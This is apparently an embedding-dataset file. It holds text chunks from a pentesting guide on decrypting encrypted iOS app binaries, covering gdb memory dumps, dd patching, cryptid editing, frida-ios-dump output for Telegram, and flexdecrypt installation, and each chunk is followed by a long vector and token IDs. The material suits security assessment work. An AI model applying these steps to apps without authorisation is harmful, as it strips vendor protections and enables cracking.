436.txt
5
: start _ address = 0x4000 + 0x4000 = 0x8000 _ _ and end _ address = 0x8000 + 0x109c000 = 0x10a4000with this information it's just necessary to run the application in the jailbroken device, attach to the process with gdb ( gdb - p < pid > ) and dump the memory : dump memory dump. bin 0x8000 0x10a4000congrats! you have decrypted the encrypted section in dump. bin. now transfer this dump to your computer and overwrite the encrypted section with the decrypted one : dd bs = 1 seek = < starting _ address > conv = notrunc if = dump. bin of = original _ appthere is one more step to complete. the application is still indicating in its metadata that it's encrypted, but it isn't. then, when executed, the device will try to decrypt the already decrypted section and it's going to fail. however, you can use tools like machoview to change this info. just open the binary and set the cryptid to 0 : decryption ( automatically ) frida - ios - dumpyou can use tools like frida - ios - dump to automatically remove the encryption and an app. first, make sure that the configuration in frida - ios - dump dump. py is set to either localhost with port 2222 when using iproxy, or to the actual ip address and port of the device from which you want to dump the binary. now you can safely use the tool to enumerate the apps installed : $ python dump. py - l pid name identifier - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 860 cydia com. saurik. cydia1130 settings com. apple. preferences 685 mail com. apple. mobilemail 834 telegram ph. telegra. telegraph - stocks com. apple. stocks... and you can dump one of the listed binaries : $ python3 dump. py - u " root " - p " < password > " ph
[ -0.02226255089044571, -0.7189325094223022, -0.6103413105010986, 0.41263917088508606, -0.19064030051231384, 0.046148404479026794, -0.16468285024166107, 0.9714288711547852, -0.00847253855317831, 0.9013764262199402, -0.2562684118747711, 0.5327699780464172, 0.49447643756866455, -0.5254287719726562, -0.4068864583969116, -0.12262663245201111, -0.6001968383789062, -0.24313661456108093, -0.5220127701759338, 0.38325774669647217, 0.5721742510795593, -0.029902951791882515, -0.3809559643268585, -1.1358641386032104, 0.04991620406508446, 0.3955208361148834, 0.6442500948905945, 0.34377002716064453, 0.5357742309570312, 1.1676609516143799, 0.2176004946231842, 0.5095198750495911, 0.3646140992641449, -0.05612332746386528, 0.3921801745891571, 0.1434922218322754, 1.0750356912612915, -0.08830297738313675, 0.12164387106895447, -0.5610730051994324, -0.19237354397773743, -0.4061659276485443, 0.6281847357749939, -0.12421184778213501, -1.2475135326385498, -0.9582470059394836, -0.5002784729003906, 0.08878642320632935, 0.14871525764465332, 0.09803904592990875, 0.37288898229599, 0.3070460557937622, -0.25272029638290405, 0.12236311286687851, 0.07121218740940094, 0.031129376962780952, 0.2288345843553543, 0.17346392571926117, -0.9622608423233032, 0.21038272976875305, 0.16630201041698456, 0.877181351184845, 0.32125067710876465, -0.5334464311599731, 0.2073957920074463, 0.7542985677719116, -0.6773043274879456, -0.5396602153778076, -0.5564844012260437, -0.6556990742683411, -0.33062708377838135, 0.5419010519981384, -0.15715038776397705, -0.49758240580558777, -0.020131312310695648, -0.4187559485435486, -0.16766029596328735, -1.0959882736206055, -0.15791381895542145, 1.0597779750823975, -0.4044947028160095, 0.40340110659599304, 0.8682542443275452, -0.3562856912612915, -0.3916812539100647, -0.17105019092559814, 0.4434361457824707, -0.01189357414841652, -0.4601811170578003, 0.2770426869392395, 0.17915263772010803, 0.3184077739715576, -0.9102597236633301, -0.24065832793712616, 0.43883204460144043, 1.6502506732940674, -0.3158474564552307, -0.24172450602054596, 0.5762625336647034, -0.40574488043785095, 0.7338784337043762, 0.28530973196029663, 0.14620907604694366, 0.449405699968338, -0.3073825240135193, 0.39410075545310974, 0.22937095165252686, -0.07540296763181686, -0.09557698667049408, -0.09327655285596848, 0.5586088299751282, -0.3406037390232086, 0.3357124924659729, -0.8473140597343445, 0.060983121395111084, 0.4060903489589691, 0.44304218888282776, -0.29015690088272095, -0.21999289095401764, 0.4872123599052429, -0.04866298660635948, -0.13309551775455475, 0.585038959980011, -0.09158205986022949, 0.3319920301437378, -0.055569522082805634, 0.19839982688426971, 0.9366399645805359, -1.0527150630950928, -0.5790008902549744, -0.6305500268936157, -0.5117869973182678, -0.07993665337562561, 0.5788509845733643, -0.6480857133865356, -0.2966192960739136, 0.47231757640838623, 0.041745081543922424, 0.5344240069389343, -0.8452057242393494, 0.38744160532951355, -0.11619915813207626, 0.047767046838998795, 1.211240530014038, 0.5709710121154785, -0.018645096570253372, -0.3696756958961487, 0.5675727128982544, 0.17432484030723572, 0.8283089995384216, 0.11293600499629974, 0.2207506150007248, 0.8540575504302979, -0.32844820618629456, -0.22282803058624268, 0.0796889066696167, -0.2260042428970337, 0.8622875809669495, -0.35747861862182617, 0.03751707077026367, -0.02533475123345852, 0.3258998394012451, -0.1590646654367447, 0.39851197600364685, -0.03246457874774933, 0.046912211924791336, -0.6598055958747864, -0.6117514371871948, 0.2866722047328949, 0.6933391094207764, -0.16487376391887665, 0.1465989649295807, 0.15081687271595, -0.21731455624103546, 1.2321275472640991, 0.41220149397850037, 0.04869852587580681, 0.09782223403453827, 0.5290806293487549, 0.7923516035079956, -0.7052929997444153, 0.14903362095355988, 0.32304561138153076, 0.5541853904724121, -0.22248201072216034, 0.3371202349662781, -0.27411606907844543, -0.21085743606090546, -0.6647077798843384, 0.06182734668254852, -0.22284670174121857, 1.1083431243896484, -0.8410767912864685, 0.6983842253684998, 0.6007197499275208, 0.4253208041191101, -1.7429970502853394, -0.2396148443222046, -0.417106568813324, -1.6549409627914429, -0.566120445728302, -0.278450608253479, 0.08857416361570358, 0.609775960445404, -0.24028365314006805, 0.6539673805236816, 0.7966524958610535, 0.25804486870765686, 0.11865703761577606, 0.2927837371826172, 0.7720437049865723, -0.46496596932411194, -0.8104158043861389, -0.186567485332489, 0.5154407620429993, -0.5362816452980042, -0.00046681956155225635, -0.025001222267746925, 0.2016693651676178, -0.12445752322673798, 0.08016062527894974, 0.7176302075386047, 1.3280681371688843, 0.5956721305847168, -0.01095715444535017, -0.4841947853565216, 0.1925787776708603, 0.008794494904577732, -0.3695079982280731, 0.38264569640159607, 0.7136605381965637, 0.4278401732444763, 0.7792429327964783, 0.8911175727844238, 0.0019067272078245878, -0.38385114073753357, 0.17813603579998016, 0.4670525789260864, -0.6721755862236023, -0.017349563539028168, -0.2370276302099228, 1.2376327514648438, 0.38767170906066895, 0.12373173981904984, 0.6823976039886475, 0.12890742719173431, -0.213827982544899, 0.3683052957057953, 0.8785497546195984, 0.9481804966926575, -0.6748076677322388, 0.5220683813095093, 0.31447073817253113, 0.2012922763824463, -0.5401067137718201, -0.6050559878349304, 0.9626354575157166, 1.0027517080307007, -0.6933655142784119, -0.462525337934494, 0.6164087057113647, -0.009317359887063503, -0.4249577522277832, 0.23822785913944244, 0.16475339233875275, 0.9758498072624207, -0.4708368182182312, -0.3454519510269165, -0.196260005235672, -0.6681931614875793, -0.16800352931022644, -0.585358738899231, -1.0861272811889648, -0.1544942557811737, -1.0731201171875, 0.34273144602775574, 0.7773804068565369, -0.1230631098151207, 0.41601327061653137, -0.6402807235717773, -0.19752319157123566, 0.21274182200431824, 0.5902633666992188, 0.5555864572525024, 0.4790796637535095, -0.44641178846359253, -0.9333879947662354, -0.07420159876346588, -0.15980257093906403, 0.6927157044410706, -0.7862305045127869, 0.07317524403333664, -0.3767085373401642, -0.7770669460296631, 0.18456286191940308, -0.6491667628288269, 0.6156111359596252, -0.11071159690618515, -0.7780186533927917, 0.02849806286394596, 0.0679960548877716, 0.49560457468032837, 0.34624531865119934, 0.16912634670734406, -0.42443618178367615, 0.7258389592170715, 0.2876589298248291, -0.1602865606546402, 0.4956847131252289, -0.2305128574371338, -0.8920404314994812, 0.4419785439968109, 0.7155388593673706, 0.519388735294342, -0.770074725151062, 0.05132581666111946, 0.8448951244354248, -0.22787949442863464, -0.22335277497768402, -0.33539658784866333, 0.3104640245437622, -0.278443306684494, -0.3552838861942291, 0.04824863746762276, 0.5405746102333069, 0.2283320277929306, 0.17814454436302185, -1.3440146446228027, 0.37447166442871094, 0.07821507751941681, -0.20690883696079254, -0.26430463790893555, 0.09347671270370483, 0.8318725228309631, -0.5023316144943237, 0.7926068902015686, -0.1506800502538681, 0.23395250737667084, 0.012994225136935711, 0.3291863203048706, 0.314357727766037, -0.8438723683357239, 0.15024912357330322, 0.42702993750572205, -0.4034920036792755, -0.05858147516846657, 0.23782463371753693, -0.3445799648761749, -0.47490787506103516, 0.016460120677947998, -0.46734553575515747, -0.6079074740409851, 0.4670259952545166, 0.3347257077693939, 0.9296402335166931, 0.4287755787372589, -0.6076189279556274, -0.10818971693515778, 0.7918259501457214, 0.15542852878570557, 0.05157039687037468, 0.053356900811195374, 0.5091326832771301, 0.5056537985801697, -0.2010185718536377, -0.8028480410575867, 0.2061162292957306, 0.9959657788276672, 0.48016324639320374, 0.3714251220226288, 0.20310422778129578, -0.718362033367157, -0.13285645842552185, 0.5353206396102905, -0.8267036080360413, -0.5403192639350891, 0.8960332274436951, 0.19939179718494415, 0.5220509171485901, -0.6127815246582031, 0.5071088075637817, -0.34356689453125, -0.3842394948005676, 0.6955673098564148, 0.6754257678985596, -0.11843578517436981, -1.2081776857376099, -0.5078302621841431, -0.21078945696353912, -0.25459933280944824, 0.39047175645828247, -0.18572726845741272, 0.15775947272777557, -0.619941771030426, -0.603951096534729, -1.1463606357574463, 1.1247797012329102, 0.9143804907798767, 1.1590356826782227, -0.07769773155450821, 0.5057473182678223, 0.5566253066062927, -0.5579947233200073, 0.42173072695732117, -0.6145312190055847, 0.27147889137268066, -0.23900093138217926, 0.9807288646697998, -0.5755194425582886, 0.15944837033748627, -0.4630812108516693, -0.18971729278564453, -0.681873083114624, -0.01765473559498787, -0.6462239623069763, 0.17656724154949188, -0.9509642720222473, -0.2776402533054352, -0.45696523785591125, 0.1856410801410675, -0.84047532081604, -0.21221424639225006, -0.3069498538970947, 0.3105524778366089, 0.8747128248214722, -0.5810822248458862, -0.24174679815769196, -0.9213692545890808, 0.08647483587265015, -0.06530983000993729, 0.05709715560078621, -0.37361255288124084, -1.1778559684753418, -0.7141189575195312, -1.0005635023117065, 0.42568346858024597, 0.5491470098495483, -0.018982714042067528, 0.2442837655544281, -0.7721062302589417, -0.4809713661670685, 0.8601256012916565, -0.3144577145576477, -0.5244297385215759, -0.11401907354593277, 0.3412138521671295, 0.4817580282688141, 0.46035510301589966, 0.2205902636051178, -0.2302969992160797, 0.1472523957490921, -0.5971362590789795, 0.2879514992237091, -0.8695816397666931, 0.17464472353458405, 0.4374971091747284, -0.329618901014328, 0.17835362255573273, 0.45064517855644226, -0.6005695462226868, 0.32226860523223877, -0.36730334162712097, 0.2138971984386444, -0.09260206669569016, -0.8680552840232849, 0.4587077498435974, -0.24548014998435974, -0.5197462439537048, 0.31986987590789795, 0.6849944591522217, -0.41478002071380615, 0.6505671739578247, -0.3572969138622284, -0.1406789869070053, 0.5753283500671387, -0.5380534529685974, 1.3874435424804688, 0.11947641521692276, -0.0034799089189618826, -0.03110545687377453, -0.807872474193573, 1.234188437461853, 0.3070763945579529, 0.38752517104148865, -1.1401921510696411, -1.1649155616760254, -0.32495352625846863, -0.08268493413925171, -0.45964285731315613, 0.6753765940666199, 0.2791597843170166, -0.16593006253242493, 0.11084776371717453, -0.13062387704849243, -0.49438363313674927, -0.382500559091568, -0.3515405058860779, -0.5451962351799011, 0.1968138962984085, 0.1306004375219345, 0.6987711191177368, -0.28451085090637207, -0.26180049777030945, 0.7044059038162231, -0.2468012273311615, 0.0028886510990560055, -1.0114232301712036, -0.1585610955953598, -0.25812214612960815, 0.1186857670545578, -0.3455125391483307, 0.6698427796363831, -0.04856592044234276, -0.6309976577758789, 0.32191693782806396, -0.01931067556142807, 0.21416670083999634, -0.5339698195457458, -0.8784028887748718, 0.5983049869537354, 0.645066499710083, 0.044727738946676254, 0.10107249766588211, 0.615441083908081, 0.3405989408493042, 0.23472851514816284, -0.896553635597229, -0.751629114151001, -0.7705819010734558, -0.6008412837982178, 0.9642236232757568, -0.9489058256149292, -0.16404137015342712, -0.8041647672653198, -0.48255765438079834, -0.7102916240692139, 0.16320395469665527, 0.9963043928146362, -1.224245548248291, 0.23841623961925507, -0.5349271893501282, 0.6325311064720154, -0.44704383611679077, 0.1831478625535965, -0.7239922285079956, -0.3479270040988922, -0.02900637686252594, 0.5984253883361816, 0.17710310220718384, -0.23055660724639893, -0.008849676698446274, 0.4776464104652405, 0.12891508638858795, -0.038947220891714096, -0.5879268646240234, -0.41236555576324463, -0.42981716990470886, -0.005166713614016771, -0.20499569177627563, 0.8122990727424622, -0.578071117401123, 0.5558062791824341, -0.047744594514369965, -0.20281581580638885, 0.7950004935264587, -0.11352863907814026, 0.2415962666273117, 0.5643686652183533, 1.1250380277633667, -0.4915230870246887, -0.15277664363384247, 0.20116935670375824, 0.5891862511634827, 0.7326939105987549, -0.3901127576828003, -0.5240300297737122, 0.3488120138645172, -0.24142947793006897, -1.517441749572754, 0.038096342235803604, 0.010615592822432518, 0.02719719707965851, 0.020751018077135086, -0.23561450839042664, 0.22134365141391754, -0.449823796749115, 0.12161248177289963, 1.1056779623031616, 0.49877500534057617, 0.543870210647583, -1.4628214836120605, 0.5740870237350464, 1.008062720298767, -1.1760145425796509, -0.16429373621940613, -0.5989057421684265, 0.1426343023777008, 0.4738015830516815, 0.15092036128044128, -0.18963617086410522, -1.0104612112045288, -0.19608423113822937, 0.359052836894989, 0.3026667833328247, 0.576411783695221, 0.01438174955546856, -1.3570566177368164, 0.11342127621173859, 0.5275529623031616, -0.19291573762893677, -0.1864878088235855, 0.5474172830581665, 0.5979615449905396, 0.148520365357399, -0.3504415452480316, 0.07155653834342957, 0.45794954895973206, 0.6855360865592957, 0.4475001096725464, -0.27888569235801697, -0.5993553400039673, 0.7157352566719055, 0.46486008167266846, -1.0384547710418701, -0.7845391631126404, -0.055393900722265244, -0.2458115816116333, -0.2624555826187134, -0.6175029873847961, -0.06048031896352768, -0.000047467852709814906, -0.1776886135339737, 0.5525598526000977, 0.3173564672470093, -0.1807527393102646, -0.13769814372062683, -0.4756825864315033, 0.5936402082443237, -0.16361841559410095, -0.24775347113609314, 0.3901788294315338, -1.0465151071548462, -0.6258481740951538, -1.644299864768982, -0.2975636124610901, 0.04203719645738602, 0.10538127273321152, 0.9113368988037109, 0.20861473679542542, 0.5913262963294983, 0.07421291619539261, -0.4325706660747528, 0.5786926746368408, 0.4472143352031708, 0.6511083245277405, 0.7937909960746765, -0.5574581623077393, -1.1867060661315918, -0.33095699548721313, 0.8306622505187988, 0.025179699063301086, 0.415837824344635, -0.42478805780410767, -0.12044654786586761, -0.6981444358825684, 0.3953991234302521, -0.5483713150024414, -0.8294618725776672, -0.4613375663757324, -0.8778232932090759, -0.31117501854896545, -0.05816062539815903, -0.5368676781654358, -0.4564705491065979, -0.30065736174583435, 0.03844372555613518, -0.6875032782554626, 0.059069253504276276, 0.3085569143295288, -0.15309187769889832, 0.07438721507787704, -0.5790902376174927, 0.417678564786911, -1.146986722946167, -1.0117422342300415, -0.379900187253952, -0.4119301736354828, -0.082498699426651, -0.19802257418632507, -0.26441019773483276, -0.2810617685317993, -1.073296308517456, 0.7060824036598206, -0.7510534524917603, -0.3125893771648407, -0.4002073407173157, -0.0800965428352356, 0.843909502029419, 0.444828063249588, -0.3846736550331116, 0.7872085571289062, 0.2080855667591095, 0.13583607971668243, 0.08980324119329453, -0.8223041296005249, 0.6916016936302185, 0.18692980706691742, 0.1282726675271988, 0.15421156585216522, -0.6697005033493042, -0.11829224228858948, 0.6229564547538757, 0.14630544185638428, -0.5427193641662598, -0.04784148186445236, -1.2501593828201294, -0.7527663707733154, -0.052290987223386765, -0.20280525088310242, -0.3964637517929077, 0.7810177803039551, 0.6347132921218872, 0.28972363471984863, -0.46378618478775024, 0.2680281400680542, 0.41287297010421753, -0.15695567429065704, -0.15103228390216827, 0.4314424693584442, -0.12184714525938034, 0.12213325500488281, -0.05753302574157715, -0.19004452228546143, -0.3195066750049591, 0.2855088412761688, -0.4992626905441284, -0.14500994980335236, -0.3029235005378723, -0.4008435308933258, -0.018536277115345, 0.3656297028064728, 0.30049940943717957, 0.1412249654531479, 0.07290071994066238, 0.24213866889476776, -0.8272556066513062, 0.4362694025039673, -0.6201944947242737, -0.624336302280426, 0.43114206194877625, -0.018558716401457787, -0.3137838840484619, -0.2690267562866211, 0.27108123898506165, 0.30303746461868286, -0.10006393492221832, -0.1647346317768097, 0.8608847856521606, 0.26273784041404724, 0.22557149827480316, 0.7687810063362122, -0.43736040592193604, -0.2393983155488968, -0.6832389235496521, 0.8116414546966553, -0.3762530982494354, -1.144323468208313, 0.676071286201477, 0.8031083941459656, 0.9797625541687012, -0.32126179337501526, -0.48520007729530334, -0.6914035081863403, 0.6693220138549805, 0.3567187488079071, 0.6032356023788452, 0.2552150785923004, -0.8249506950378418, 0.6578872203826904, -0.1308668851852417, 0.31973758339881897, 0.05947607755661011, -0.059477075934410095, 0.47639596462249756, 0.3573859930038452, 0.1406097561120987, 0.24818134307861328, 0.2876322567462921, -0.008821988478302956, 1.1358641386032104, 0.35729050636291504, 0.7948024272918701, -0.31213077902793884, 0.35618656873703003, -0.6446604132652283, 0.7664374113082886, 0.6735467314720154, -0.051905687898397446, -0.17859406769275665, 0.36541011929512024, 0.395793080329895, -0.5693742632865906, 0.38753777742385864, 0.6127189993858337, 0.21418645977973938, -0.14670303463935852, 0.0840541422367096, 0.013206248171627522, -1.004624605178833, 0.32407239079475403, -0.4318954348564148, 0.0200653038918972, -0.1917428821325302, 0.5329828858375549, -0.00022114242892712355, 0.2230059653520584, 1.041261911392212, -0.5518030524253845, 0.902039647102356, -0.12691570818424225, -0.16361236572265625, 0.2112898826599121, 0.01215998362749815, -1.4298492670059204, 0.14944715797901154, 0.6969756484031677, 0.45865485072135925, -0.058962248265743256, 0.7146829962730408, 0.09574786573648453, -0.18358220160007477, 0.2623629570007324, 0.10175081342458725, -1.1377439498901367, 0.006334162317216396, 0.404799222946167, -0.8770424723625183, -0.8131858706474304, 0.017658237367868423, 0.4412623941898346, -0.886864423751831, 0.5967944264411926, -0.3311728239059448, 0.2986024022102356, -0.2142062783241272, -0.2338247448205948, -0.30223143100738525, 0.27821260690689087, 0.5080039501190186, -1.0447254180908203, -1.394460678100586, 1.0793746709823608, 0.05415347218513489, -0.040577687323093414, -0.49187272787094116, 1.2222166061401367, -0.3471710979938507, 0.24682478606700897, -0.13867896795272827, -0.5716800093650818, -0.03871304914355278, -0.04571618139743805, -0.247162863612175, -0.5824683904647827, -0.2186732441186905, -0.5175532698631287, 0.6389797925949097, -0.1657535880804062, -0.5934047698974609, -0.42708277702331543, -0.16147185862064362, -0.41646167635917664, -0.7701578140258789, 0.4690853953361511, -1.0531383752822876, -0.3405005931854248, 0.33142900466918945, 0.12792880833148956, 0.2947808802127838, 0.5952198505401611, -0.4433170258998871, -0.8630353808403015, -0.4302651584148407, 0.029084239155054092, -0.4189019203186035, 1.2299875020980835, -1.3172615766525269, -0.08664366602897644, 0.06453382968902588, -0.6270143985748291, -0.6927882432937622, 0.24015143513679504, -0.49623873829841614, -0.5342037677764893, 0.24034295976161957, 0.061703771352767944, 0.9788907170295715, 0.8015357851982117, 0.33702388405799866, -0.7384263873100281, 0.7958356142044067, 0.584379255771637, -0.20190271735191345, 0.27526435256004333, 0.3577727675437927, -0.058934327214956284, 0.4437367618083954, -0.0368550680577755, 0.8255388736724854, -0.3213413655757904, -0.2585369348526001, 0.15994368493556976, -0.2834423780441284, -0.9284720420837402, -0.11471235752105713, -0.02242336794734001, 0.2195357382297516, -0.43394342064857483, 0.07929341495037079, -0.8733456134796143, 0.2373586893081665, -0.5832833051681519, 0.20330743491649628, -0.01710536703467369, -0.38083210587501526, 0.07030642777681351, -0.2717077434062958, 0.1742948442697525, -1.6319012641906738, 3.880035400390625, 0.7166261076927185, -0.23449309170246124, 1.1452652215957642, 0.5157103538513184, 0.0340493842959404, 0.8550176024436951, -0.8753416538238525, 0.15562351047992706, -0.5689337253570557, -0.03144267201423645, -0.37589308619499207, 0.9533095359802246, 0.06139256805181503, -0.06297950446605682, 0.2806265652179718, -0.3515867590904236, 0.8735734820365906, 0.532204270362854, -0.7080991864204407, -1.0403475761413574, 0.3404048979282379, -0.03262554109096527, 1.1365160942077637, -0.12233410775661469, 0.41401994228363037, 0.7279771566390991, -0.45924314856529236, -0.17339575290679932, -0.04758068174123764, 0.022532185539603233, -0.43367376923561096, 0.15527458488941193, -0.4060438573360443, -0.4570280909538269, 0.27714189887046814, 0.129933163523674, -0.8052781820297241, 0.09506621956825256, 0.12396837770938873, 0.1797044575214386, -0.18157349526882172, 0.8606604337692261, -0.1519751250743866, 0.5008004903793335, 0.9567270874977112, -0.7127518653869629, 0.2540183663368225, 0.38734740018844604, -0.46983247995376587, 0.2598893642425537, -0.0563170351088047, 0.4377925395965576, 0.15149949491024017, -0.2182197868824005, 0.3854849934577942, 0.21733976900577545, -0.8104819059371948, 0.10262534022331238, -0.395148903131485, 0.360067754983902, -0.8261371850967407, -0.08928721398115158, -0.65291428565979, -1.3159676790237427, 0.1519632637500763, -0.11870945245027542, 0.7443328499794006, 0.22447660565376282, 0.05122730880975723, -0.6234995126724243, -0.32208365201950073, -1.3564627170562744, 0.1953435093164444, 0.76336270570755, -0.032004136592149734, 0.1784028261899948, 0.3850548267364502, 0.11075001209974289, -0.6694269180297852, 0.3106834888458252, -0.7996721267700195, -0.9775693416595459, 0.15648411214351654, 0.8543305993080139, 0.32304638624191284, 0.09170891344547272, -0.678120493888855, 0.389553427696228, 0.3745650351047516, 0.5862710475921631, -0.36798566579818726, 0.19209012389183044, 0.09032712876796722, 0.7594699263572693 ]
[ 1024, 2707, 1035, 4769, 1027, 1014, 2595, 29537, 2692, 1009, 1014, 2595, 29537, 2692, 1027, 1014, 2595, 17914, 8889, 1035, 1035, 1998, 2203, 1035, 4769, 1027, 1014, 2595, 17914, 8889, 1009, 1014, 2595, 10790, 2683, 2278, 8889, 2692, 1027, 1014, 2595, 10790, 2050, 29537, 2692, 24415, 2023, 2592, 2009, 1005, 1055, 2074, 4072, 2000, 2448, 1996, 4646, 1999, 1996, 7173, 29162, 5080, 1010, 22476, 2000, 1996, 2832, 2007, 1043, 18939, 1006, 1043, 18939, 1011, 1052, 1026, 14255, 2094, 1028, 1007, 1998, 15653, 1996, 3638, 1024, 15653, 3638, 15653, 1012, 8026, 1014, 2595, 17914, 8889, 1014, 2595, 10790, 2050, 29537, 2692, 8663, 17643, 3215, 999, 2017, 2031, 11703, 2854, 13876, 2098, 1996, 4372, 26775, 22571, 3064, 2930, 1999, 15653, 1012, 8026, 1012, 2085, 4651, 2023, 15653, 2000, 2115, 3274, 1998, 2058, 26373, 1996, 4372, 26775, 22571, 3064, 2930, 2007, 1996, 11703, 2854, 13876, 2098, 2028, 1024, 20315, 18667, 1027, 1015, 6148, 1027, 1026, 3225, 1035, 4769, 1028, 9530, 2615, 1027, 2025, 15532, 2278, 2065, 1027, 15653, 1012, 8026, 1997, 1027, 2434, 1035, 10439, 12399, 2063, 2003, 2028, 2062, 3357, 2000, 3143, 1012, 1996, 4646, 2003, 2145, 8131, 1999, 2049, 27425, 2008, 2009, 1005, 1055, 4372, 26775, 22571, 3064, 1010, 2021, 2009, 3475, 1005, 1056, 1012, 2059, 1010, 2043, 6472, 1010, 1996, 5080, 2097, 3046, 2000, 11703, 2854, 13876, 1996, 2525, 11703, 2854, 13876, 2098, 2930, 1998, 2009, 1005, 1055, 2183, 2000, 8246, 1012, 2174, 1010, 2017, 2064, 2224, 5906, 2066, 24532, 4492, 2666, 2860, 2000, 2689, 2023, 18558, 1012, 2074, 2330, 1996, 12441, 1998, 2275, 1996, 19888, 3593, 2000, 1014, 1024, 11703, 2854, 16790, 1006, 8073, 1007, 10424, 8524, 1011, 16380, 1011, 15653, 29337, 2064, 2224, 5906, 2066, 10424, 8524, 1011, 16380, 1011, 15653, 2000, 8073, 6366, 1996, 21999, 1998, 2019, 10439, 1012, 2034, 1010, 2191, 2469, 2008, 1996, 9563, 1999, 10424, 8524, 1011, 16380, 1011, 15653, 15653, 1012, 1052, 2100, 2003, 2275, 2000, 2593, 2334, 15006, 2102, 2007, 3417, 19015, 2475, 2043, 2478, 12997, 3217, 18037, 1010, 2030, 2000, 1996, 5025, 12997, 4769, 1998, 3417, 1997, 1996, 5080, 2013, 2029, 2017, 2215, 2000, 15653, 1996, 12441, 1012, 2085, 2017, 2064, 9689, 2224, 1996, 6994, 2000, 4372, 17897, 11657, 1996, 18726, 5361, 1024, 1002, 18750, 15653, 1012, 1052, 2100, 1011, 1048, 14255, 2094, 2171, 8909, 4765, 18095, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 6564, 2692, 22330, 9032, 4012, 1012, 7842, 9496, 2243, 1012, 22330, 9032, 14526, 14142, 10906, 4012, 1012, 6207, 1012, 18394, 6273, 2629, 5653, 4012, 1012, 6207, 1012, 4684, 21397, 6640, 2549, 23921, 6887, 1012, 10093, 13910, 2527, 1012, 10013, 1011, 15768, 4012, 1012, 6207, 1012, 15768, 1012, 1012, 1012, 1998, 2017, 2064, 15653, 2028, 1997, 1996, 3205, 8026, 12086, 1024, 1002, 18750, 2509, 15653, 1012, 1052, 2100, 1011, 1057, 1000, 7117, 1000, 1011, 1052, 1000, 1026, 20786, 1028, 1000, 6887 ]
hack_tricks
436.txt
6
. telegra. telegraphstart the target app ph. telegra. telegraphdumping telegram to / var / folders / qw / gz47 _ 8 _ n6xx1c _ lwq7pq5k040000gn / t [ frida - ios - dump ] : hockeysdk. framework has been loaded. [ frida - ios - dump ] : load postbox. framework success. [ frida - ios - dump ] : libswiftcontacts. dylib has been dlopen.... start dump / private / var / containers / bundle / application / 14002d30 - b113 - 4fdf - bd25 - 1bf740383149 / telegram. app / frameworks / libswiftsimd. dyliblibswiftsimd. dylib. fid : 100 % | [UNK] | 343k / 343k [ 00 : 00 < 00 : 00, 1. 54mb / s ] start dump / private / var / containers / bundle / application / 14002d30 - b113 - 4fdf - bd25 - 1bf740383149 / telegram. app / frameworks / libswiftcoredata. dyliblibswiftcoredata. dylib. fid : 100 % | [UNK] | 82. 5k / 82. 5k [ 00 : 00 < 00 : 00, 477kb / s ] 5. m4a : 80. 9mb [ 00 : 14, 5. 85mb / s ] 0. 00b [ 00 : 00,? b / s ] generating " telegram. ipa " after this, the telegram. ipa file will be created in your current directory. you can validate the success of the dump by removing the app and reinstalling it ( e. g. using ios - deploy ios - deploy - b telegram. ipa ). note that this will only work on jailbroken devices, as otherwise the signature won't be valid. flexdecryptin order to obtain the ipa file from an installed application you can also use the tool flexdecrypt or a wrapper of the tool called flexdump. in any case you will need to install flexdecrypt in the device running something like : wget url - i flexdecrypt. debrm flexdecrypt. deband in order
[ 0.6655169129371643, -0.46726536750793457, -0.2427581399679184, 0.768216609954834, -0.2964271008968353, -0.08207253366708755, -0.30635377764701843, 0.4877837896347046, 0.35597699880599976, 0.5119166970252991, -0.03304409980773926, -0.29757562279701233, 0.23986804485321045, -0.6630646586418152, -0.6173495054244995, -0.2308896780014038, -0.4773111641407013, 0.00567843159660697, -0.23248857259750366, -0.3552563488483429, 0.06206537410616875, 0.14754270017147064, -1.0341111421585083, -0.6390656232833862, -0.12141329795122147, 0.6800583600997925, 0.777224063873291, -0.1866859793663025, 0.8488731384277344, 0.47342222929000854, 0.4609123468399048, 0.11671794205904007, 0.19928978383541107, -0.35618916153907776, 0.2861103415489197, -0.5140352845191956, 0.8059298992156982, -0.2064225822687149, 0.386653333902359, -0.3544754087924957, 0.4136388301849365, -0.631441056728363, 0.26691344380378723, -0.04565435275435448, -0.4056971073150635, -0.7904649376869202, -0.051815494894981384, -0.3076796233654022, 0.5281899571418762, -0.3039741516113281, 0.04241811856627464, 0.2192537486553192, 0.19874157011508942, 0.4179239869117737, 0.0701601505279541, -0.146851047873497, -0.5303288102149963, 0.058672331273555756, 0.009603628888726234, 0.6738067269325256, -0.230360746383667, 0.5006997585296631, 0.2636905610561371, -0.7219887971878052, 0.04581519961357117, 0.28475096821784973, -0.04039508104324341, -0.04735415428876877, -0.49479278922080994, -0.6928249597549438, -0.5317778587341309, 0.9148715734481812, -0.612216591835022, -0.5464488863945007, -0.3349821865558624, -0.28521978855133057, -0.15138454735279083, -0.3227437436580658, -0.23396141827106476, 1.0681208372116089, -0.07153881341218948, 0.18491552770137787, -0.24848142266273499, -0.0783756747841835, -0.32644328474998474, -0.3513542115688324, 0.5906767249107361, 0.24395793676376343, -0.4103001654148102, -0.1940016895532608, 0.40825366973876953, 0.5150331854820251, -0.812427818775177, -0.5108147859573364, 0.285247266292572, 0.6661227941513062, -0.1612742841243744, 0.29801398515701294, 0.044201456010341644, -0.27890804409980774, 0.5125746130943298, 0.0835954025387764, 0.02494610846042633, 0.5315786004066467, 0.1279781460762024, 0.12327304482460022, -0.07729444652795792, -0.2851215898990631, -0.09682033956050873, 0.0005261421320028603, 0.14657370746135712, 0.05207556486129761, 0.13290007412433624, -0.6633735299110413, -0.21572065353393555, 0.3378446698188782, 0.36099785566329956, 0.3980596959590912, -0.49818167090415955, 0.4058281183242798, -0.18872791528701782, -0.6215976476669312, 0.3767867088317871, -0.08579253405332565, 0.5185697078704834, -0.3903670608997345, 0.6657954454421997, 0.43019092082977295, -0.7034094333648682, -0.29217374324798584, 0.03843451291322708, -0.27145835757255554, -0.07613398879766464, 0.39447349309921265, -0.6239535212516785, 0.10901705920696259, 0.3450407385826111, 0.35918867588043213, 0.06640277057886124, -0.21317975223064423, 0.13391940295696259, 0.1346711665391922, 